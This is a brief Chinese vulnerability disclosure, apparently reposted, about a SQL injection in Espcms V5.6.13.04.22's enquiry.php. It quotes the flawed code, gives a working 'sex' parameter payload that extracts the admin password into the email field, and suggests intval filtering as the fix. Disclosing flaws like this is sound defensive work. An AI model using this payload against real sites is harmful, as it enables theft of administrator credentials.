Espcms V5.6.13.04.22 UTF8 正式版注入漏洞之4/N - 网站安

Espcms V5.6.13.04.22 UTF8 正式版某文件存在注入漏洞，可获取管理员帐号和密码在文件\interface\enquiry.php:

function in_enquirysave() { parent::start_pagetemplate(); $this->fun->formpathver(); $lng = (admin_LNG == 'big5') ? $this->CON['is_lancode'] : admin_LNG; if ($this->CON['is_enquiry_memclass']) { parent::member_purview(0, $this->get_link('enquiry', array(), admin_LNG)); } $cartid = $this->fun->eccode($this->fun->accept('ecisp_enquiry_list', 'C'), 'DECODE', db_pscode); $cartid = stripslashes( html specialchars_decode($cartid)); $uncartid = !empty($cartid) ? unserialize($cartid) : 0; $userid = intval($this->fun->accept('userid', 'P')); $userid = !empty($userid) ? $userid : 0; $linkman = trim($this->fun->accept('linkman', 'P', true, true)); $email = $this->fun->accept('email', 'P'); $sex = $this->fun->accept('sex', 'P'); $sex = empty($sex) ? 0 : $sex; $sex变量没有使用intval过滤，进入后面的sql中也没有被包含在单引号内 $db_field = 'enquirysn,userid,linkman,sex,country,province,city,district,address,zipcode,tel,fax,mobile,email,content,isclass,addtime,edittime'; $db_values = "'$enquirysn',$userid,'$linkman',$sex,$country,$province,$city,$district,'$address','$zipcode','$tel','$fax','$mobile','$email','$content',0,$addtime,0"; $this->db->query('INSERT INTO ' . $db_table . ' (' . $db_field . ') VALUES (' . $db_values . ')');

修改sex值为下面：

sex=0,0,0,0,0,1,0,13800000000,0,13800000000,(select password from espcms_admin_member limit 1),0,0,1368528987,0)%23 把管理员的密码插入到邮件地址中：

修复方案： intval过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did15053

更新时间：2022-09-13 阅读：48次